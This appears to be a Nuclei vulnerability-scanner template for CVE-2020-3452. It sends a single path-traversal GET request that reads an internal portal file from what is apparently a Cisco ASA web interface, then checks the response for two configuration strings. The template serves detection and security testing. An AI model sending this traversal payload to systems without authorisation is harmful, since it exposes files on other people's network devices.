id: CVE-2020-3452 # Source: https://twitter.com/aboul3la/status/1286012324722155525 info: name: CVE-2020-3452 author: pdteam severity: medium requests: - method: GET path: - "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" matchers: - type: word words: - "INTERNAL_PASSWORD_ENABLED" - "CONF_VIRTUAL_KEYBOARD" condition: and